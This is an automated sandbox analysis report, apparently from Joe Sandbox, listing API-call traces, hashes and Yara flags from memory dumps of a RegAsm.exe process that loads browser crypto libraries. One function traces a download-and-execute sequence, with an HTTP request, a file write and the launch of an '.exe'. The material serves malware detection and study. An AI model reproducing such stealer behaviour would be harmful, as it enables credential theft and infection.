Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
String ID:
API String ID: 3903481028-0
Opcode ID: 2869f594357899240d5afc8a67f73aa245ba7f2cffbbe392e5212b4997b150f3
Instruction ID: 2175de582dc4607578c899f2e25dbb6a8dbf5eb24e70aaef62d05a5b353bf059
Opcode Fuzzy Hash: 2869f594357899240d5afc8a67f73aa245ba7f2cffbbe392e5212b4997b150f3
Instruction Fuzzy Hash: 7711A3B1A00B07ABEB109E65DCC4B46F3A8EF1035EF224531E91982A40E731F664CBE1

Function 6C178DD0 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C178DE7
EnterCriticalSection.KERNEL32 ref: 6C178DFC
PR_Unlock.NSS3 ref: 6C178E2D
PR_SetError.NSS3 ref: 6C178E49

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: 172616a6e48fc60e0350257478844c95a9c7be965ffd708ad74e548ebd77b625
Instruction ID: 4ce8ee1138f3e31d1fb5937dcf0d0729d1f20ec1e8e280fb1d3fe8d92b0721bc
Opcode Fuzzy Hash: 172616a6e48fc60e0350257478844c95a9c7be965ffd708ad74e548ebd77b625
Instruction Fuzzy Hash: 10118C71605A019BD700AF78D4882AABBF4FF05754F014969DC98D7B40EB30E894CBE2

Function 6C1FAC70 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6C1E5F17,?,?,?,?,?,?,?,?,6C1EAAD4), ref: 6C1FAC94
PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6C1E5F17,?,?,?,?,?,?,?,?,6C1EAAD4), ref: 6C1FACA6
free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6C1EAAD4), ref: 6C1FACC0
free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6C1EAAD4), ref: 6C1FACDB

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: free$DestroyFreeK11_Monitor
String ID:
API String ID: 3989322779-0
Opcode ID: 05c6a924cce2bca626a18d8a748ecf738d69ad8175387b7cea67c93b2bdc0f7e
Instruction ID: db413c3a6f554c089d4e7e7c08d363dc790440b08fd3126d19d780411e5c1faa
Opcode Fuzzy Hash: 05c6a924cce2bca626a18d8a748ecf738d69ad8175387b7cea67c93b2bdc0f7e
Instruction Fuzzy Hash: EB015EB5B01B029BE750DF69E908757B7E8BF10A69B104839D86AC3E10E735F055CB91

Function 6C1BC590 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C1BC5AD

Part of subcall function 6C1B0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C1587ED,00000800,6C14EF74,00000000), ref: 6C1B1000
Part of subcall function 6C1B0FF0: PR_NewLock.NSS3(?,00000800,6C14EF74,00000000), ref: 6C1B1016
Part of subcall function 6C1B0FF0: PL_InitArenaPool.NSS3(00000000,security,6C1587ED,00000008,?,00000800,6C14EF74,00000000), ref: 6C1B102B

CERT_DecodeCertPackage.NSS3(?,?,6C1BC610,?), ref: 6C1BC5C2

Part of subcall function 6C1BC0B0: PR_SetError.NSS3(FFFFE005,00000000), ref: 6C1BC0E6

CERT_NewTempCertificate.NSS3(?,00000000,00000000,00000001), ref: 6C1BC5E0
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C1BC5EF

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Arena_Util$ArenaCertCertificateDecodeErrorFreeInitLockPackagePoolTempcalloc
String ID:
API String ID: 1454898856-0
Opcode ID: 9de364b72e4dd40f7009f869cd8772e6e09a5ffbe690d9a37a505bfe15907d98
Instruction ID: 80e7992a9760fd86239eabc7374028906c801563c4b68fd94c1bb190aca5abac
Opcode Fuzzy Hash: 9de364b72e4dd40f7009f869cd8772e6e09a5ffbe690d9a37a505bfe15907d98
Instruction Fuzzy Hash: 2C01D6F1E001086FEB00AB65DC16FBF7B78DF44658F454069EC15AB381FA71A919CAE1

Function 6C1B24E0 Relevance: 6.0, APIs: 4, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,6C18C154,000000FF,00000000,00000000,00000000,00000000,?,?,6C18C154,?), ref: 6C1B24FA
PORT_Alloc_Util.NSS3(00000000,?,6C18C154,?), ref: 6C1B2509

Part of subcall function 6C1B0BE0: malloc.MOZGLUE(6C1A8D2D,?,00000000,?), ref: 6C1B0BF8
Part of subcall function 6C1B0BE0: TlsGetValue.KERNEL32(6C1A8D2D,?,00000000,?), ref: 6C1B0C15

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,?), ref: 6C1B2525
free.MOZGLUE(00000000), ref: 6C1B2532

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: ByteCharMultiWide$Alloc_UtilValuefreemalloc
String ID:
API String ID: 929835568-0
Opcode ID: f603200ad8d16396d1d1394badeaa40740c5274e4cf50e610f300d559496feeb
Instruction ID: 7591f1d9aebba4c00dd1938d36c76609137057eb7b575b0abc6ced6b7264686a
Opcode Fuzzy Hash: f603200ad8d16396d1d1394badeaa40740c5274e4cf50e610f300d559496feeb
Instruction Fuzzy Hash: E1F062B630622176FA1026AA6D4DEB739ACDB41AF8F140221FD29D66C0D961C80585F1

Function 6C1FAC00 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

PK11_FreeSymKey.NSS3(?,6C1E5D40,00000000,?,?,6C1D6AC6,6C1E639C), ref: 6C1FAC2D

Part of subcall function 6C19ADC0: TlsGetValue.KERNEL32(?,6C17CDBB,?,6C17D079,00000000,00000001), ref: 6C19AE10
Part of subcall function 6C19ADC0: EnterCriticalSection.KERNEL32(?,?,6C17CDBB,?,6C17D079,00000000,00000001), ref: 6C19AE24
Part of subcall function 6C19ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C17D079,00000000,00000001), ref: 6C19AE5A
Part of subcall function 6C19ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C17CDBB,?,6C17D079,00000000,00000001), ref: 6C19AE6F
Part of subcall function 6C19ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C17CDBB,?,6C17D079,00000000,00000001), ref: 6C19AE7F
Part of subcall function 6C19ADC0: TlsGetValue.KERNEL32(?,6C17CDBB,?,6C17D079,00000000,00000001), ref: 6C19AEB1
Part of subcall function 6C19ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C17CDBB,?,6C17D079,00000000,00000001), ref: 6C19AEC9

PK11_FreeSymKey.NSS3(?,6C1E5D40,00000000,?,?,6C1D6AC6,6C1E639C), ref: 6C1FAC44
SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,6C1E5D40,00000000,?,?,6C1D6AC6,6C1E639C), ref: 6C1FAC59
free.MOZGLUE(8CB6FF01,6C1D6AC6,6C1E639C,?,?,?,?,?,?,?,?,?,6C1E5D40,00000000,?,6C1EAAD4), ref: 6C1FAC62

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
String ID:
API String ID: 1595327144-0
Opcode ID: 584d2b38426c47a5931a69541be35d8578b398cec532f0a786e85dc8a0b4bf22
Instruction ID: 2d0cb19e55286e2b57243ac01698d92c1cc988c4ed64e4b8a2ce9ce4919b6a4c
Opcode Fuzzy Hash: 584d2b38426c47a5931a69541be35d8578b398cec532f0a786e85dc8a0b4bf22
Instruction Fuzzy Hash: 4C018BB5A002009FDB00CF54E8D0B4677E8AF54B18F188068E9598F706D735E809CBA1

Function 00410CC0 Relevance: 6.0, APIs: 4, Instructions: 39memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,Version: ,004365B6,?,?,?), ref: 00410CD8
HeapAlloc.KERNEL32(00000000), ref: 00410CDF
GetLocalTime.KERNEL32(?), ref: 00410CEB
wsprintfA.USER32 ref: 00410D16

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocLocalProcessTimewsprintf
String ID:
API String ID: 1243822799-0
Opcode ID: 36c752227f213ab31310b608163caf76d455cb9e435b199566ed4ac49af6f798
Instruction ID: dc01e5e5b2844936c2491ae29b43284462725a4407e6f71af24be1dce237fc21
Opcode Fuzzy Hash: 36c752227f213ab31310b608163caf76d455cb9e435b199566ed4ac49af6f798
Instruction Fuzzy Hash: 9BF031B2900218BBCB50EFE59C059FF77BDAF0C616F001055F942E21C0D6388A80D775

Function 6C1E0450 Relevance: 6.0, APIs: 4, Instructions: 38synchronizationCOMMON

Download Yara Rule

APIs

ReleaseMutex.KERNEL32(40C70845,?,6C1E4710,?,000F4240,00000000), ref: 6C1E046B
GetLastError.KERNEL32(?,6C1E4710,?,000F4240,00000000), ref: 6C1E0479

Part of subcall function 6C1FBF80: TlsGetValue.KERNEL32(00000000,?,6C1E461B,-00000004), ref: 6C1FC244

PR_Unlock.NSS3(40C70845,?,6C1E4710,?,000F4240,00000000), ref: 6C1E0492
PR_SetError.NSS3(FFFFE89D,00000000,?,6C1E4710,?,000F4240,00000000), ref: 6C1E04A5

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Error$LastMutexReleaseUnlockValue
String ID:
API String ID: 4014558462-0
Opcode ID: 272f8e9e3bc2fdb71d42e76da03325a8ef64390b22e2fe211fb5b05e0c0dc910
Instruction ID: 98702bc7ca8a63bbe3f4cc41ec013b972fc6b98831c954d0e7bfc1f23fec6e15
Opcode Fuzzy Hash: 272f8e9e3bc2fdb71d42e76da03325a8ef64390b22e2fe211fb5b05e0c0dc910
Instruction Fuzzy Hash: 06F0E970B00B466BEB00AFB99E1CB1A33E99B1560DF49C474E80AC7E90FF35E444D521

Function 00412166 Relevance: 6.0, APIs: 4, Instructions: 34fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00414F04,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,00414F04,?), ref: 00412181
GetFileSizeEx.KERNEL32(00000000,00414F04,?,?,?,00414F04,?), ref: 00412199
CloseHandle.KERNEL32(00000000,?,?,?,00414F04,?), ref: 004121A4
CloseHandle.KERNEL32(00000000,?,?,?,00414F04,?), ref: 004121AC

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseFileHandle$CreateSize
String ID:
API String ID: 4148174661-0
Opcode ID: 60c869dd22308d1bedf8214e1dba4ad714ed02a08f607720dc211a2de419d2ea
Instruction ID: 748c5bf0dc294cb73453794e6f0b97d9873637447c99cc002fba7ef2639b1da9
Opcode Fuzzy Hash: 60c869dd22308d1bedf8214e1dba4ad714ed02a08f607720dc211a2de419d2ea
Instruction Fuzzy Hash: 65F0A731641214FBE720D7A0DD4AFEA3A7DEF45761F200210FE01EA1D0E7F06E818659

Function 6C26CC50 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(?), ref: 6C26CC61
free.MOZGLUE ref: 6C26CC6E
DeleteCriticalSection.KERNEL32(?), ref: 6C26CC80
free.MOZGLUE(?), ref: 6C26CC87

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: CriticalDeleteSectionfree
String ID:
API String ID: 2988086103-0
Opcode ID: 5b96e531d5f61987139b56bd4853035a4fb8980538eab9c87202a92d6a3e682f
Instruction ID: 04783c664d60f6690dfffb028a6b7ec482b8f2ff043391661a253baada234dfa
Opcode Fuzzy Hash: 5b96e531d5f61987139b56bd4853035a4fb8980538eab9c87202a92d6a3e682f
Instruction Fuzzy Hash: CEE030767006089BCA10EFA8DC4888A77ACEE496703150925EA91C3740D232F905CBA1

Function 00412B46 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124processCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416FD4,004366CB,?,?,?,?,004184E8), ref: 0041050D

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,0041757A), ref: 00410538

Part of subcall function 00405237: GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040527E
Part of subcall function 00405237: RtlAllocateHeap.NTDLL(00000000), ref: 00405285
Part of subcall function 00405237: InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 004052A7
Part of subcall function 00405237: StrCmpCA.SHLWAPI(?), ref: 004052C1
Part of subcall function 00405237: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004052F1
Part of subcall function 00405237: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00405330
Part of subcall function 00405237: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405360
Part of subcall function 00405237: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040536B

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,004366FB,?), ref: 00411C79

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,00417542,004366F5), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417013,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 004105BD

Part of subcall function 00412446: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,004149E5), ref: 00412460

_memset.LIBCMT ref: 00412C35
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00436704), ref: 00412C87

Strings

.exe, xrefs: 00412B92

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$Internet$CreateHeapHttpOpenProcessRequestlstrcat$AllocateConnectFileOptionSendSystemTime_memsetlstrlen
String ID: .exe
API String ID: 2831197775-4119554291
Opcode ID: ea919e6aaa1178b599a1704ca12eac1d250495711f040008e3264011a1976d7d
Instruction ID: 905ac66d7ddfb8a93ad67d2eb9505dfcceec98c6f2e83ded4fc26cf953e5c202
Opcode Fuzzy Hash: ea919e6aaa1178b599a1704ca12eac1d250495711f040008e3264011a1976d7d
Instruction Fuzzy Hash: 4A418372A00119BBDF11FBA6ED43ACE7775AF44348F11007AF600B7191D6B86E898AD9

Function 6C1A4D10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6C1A4D57
PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6C1A4DE6

Strings

%d.%d, xrefs: 6C1A4DDE

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: ErrorR_snprintf
String ID: %d.%d
API String ID: 2298970422-3954714993
Opcode ID: be43c273dce7ad219693fb10e7099b31641cbe8fe5f05400178ae5a6ba049297
Instruction ID: 5ba14ee7d002a96c4da64bad2fc4168fa63b83ba45d249f8bfc383b9383e61b6
Opcode Fuzzy Hash: be43c273dce7ad219693fb10e7099b31641cbe8fe5f05400178ae5a6ba049297
Instruction Fuzzy Hash: 6531E8B6D042186BEB109BF19C05BFF7768EF51308F050429ED159B781EF30991ACBA2

Function 004130F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 0041310F
strtok_s.MSVCRT ref: 00413192

Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,004170CD,004366CF,004366CE,?,?,?,?,004184E8), ref: 0041054F
Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,004170CD,004366CF,004366CE,?,?,?,?,004184E8), ref: 00410581

Strings

~A, xrefs: 00413101, 00413104

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: strtok_s$lstrcpylstrlen
String ID: ~A
API String ID: 348468850-1414967778
Opcode ID: f2dad6f9cb5b34fb74ce647c9b2c32d51f35e79e1ac764e19dad2fe0f28ed910
Instruction ID: 5b62a797658054ad5b024ce7a9a0f123bdc2acfb78dc8e97c9c9b4fe870d9712
Opcode Fuzzy Hash: f2dad6f9cb5b34fb74ce647c9b2c32d51f35e79e1ac764e19dad2fe0f28ed910
Instruction Fuzzy Hash: 50213071900105BFCB04DF54D981ADAB7B8AF14309F11116BE805FB192E774EF95CB99

Function 0040F093 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040F0D6
_memmove.LIBCMT ref: 0040F104

Strings

string too long, xrefs: 0040F0D1

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
